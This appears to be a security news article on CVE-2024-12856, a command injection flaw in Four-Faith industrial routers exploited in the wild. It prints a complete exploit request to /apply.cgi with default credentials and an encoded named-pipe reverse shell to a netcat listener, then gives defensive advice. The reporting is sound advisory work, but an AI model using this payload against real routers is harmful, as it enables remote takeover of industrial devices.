A significant post-authentication vulnerability affecting Four-Faith industrial routers has been actively exploited in the wild.
Assigned as CVE-2024-12856, this flaw allows attackers to execute unauthenticated remote command injections by leveraging the routers’ default credentials.
Details of the Exploitation
The vulnerability impacts at least two Four-Faith router models—F3x24 and F3x36.
It involves leveraging the /apply.cgi endpoint over HTTP by exploiting the adj_time_year parameter during system time modifications using the submit_type=adjust_sys_time action.
2024 MITRE ATT&CK Evaluation Results for SMEs & MSPs -> Download Free Guide
Attackers have been able to inject OS commands, which can be used to gain unauthorized remote access or launch reverse shells. A real-world example of the malicious payload sent via a POST request is as follows:
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1:90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Content-Length: 296
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
adj_time_sec=32&change_action=gozila_cgi&adj_time_day=27&adj_time_mon=10&adj_time_hour=11&adj_time_year=%24%28cd+%2Ftmp%2F%3B+mknod+bOY+p%3Bcat+bOY%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.1.206+1270+%3EbOY%3B+rm+bOY%3B%29&adj_time_min=35&submit_button=index&action=Save&submit_type=adjust_sys_timeOnce injected, the attacker can execute commands. The running process on the vulnerable device may look like this:
20938 admin    1640 S   sh -c rtc_tm ss $(cd /tmp/; mknod WaO p;cat WaO|/bin
20943 admin    1636 S   /bin/sh -i
20945 admin    1636 S   nc 192.168.1.206 1270VulnCheck observed malicious activity from the IP address 178.215.238[.]91, attempting to exploit this vulnerability with a payload matching earlier patterns.
A related blog post from November 2024 also documented similar exploitation attempts, confirming this vulnerability’s active exploitation in the wild.
Organizations using Four-Faith routers are strongly encouraged to:
- Change Default Credentials: Immediately update the default login credentials to secure values.
- Patch Systems: Consult Four-Faith for available firmware updates or patches targeting CVE-2024-12856.
- Monitor Network Traffic: Deploy the Suricata rule provided to detect ongoing exploit attempts.
- Segregate Networks: Isolate industrial control systems (ICS) from external networks to reduce attack vectors.
By addressing this vulnerability proactively, organizations can mitigate the risks posed by CVE-2024-12856.
Investigate Real-World Malicious Links, Malware & Phishing Attacks With ANY.RUN – Try for Free
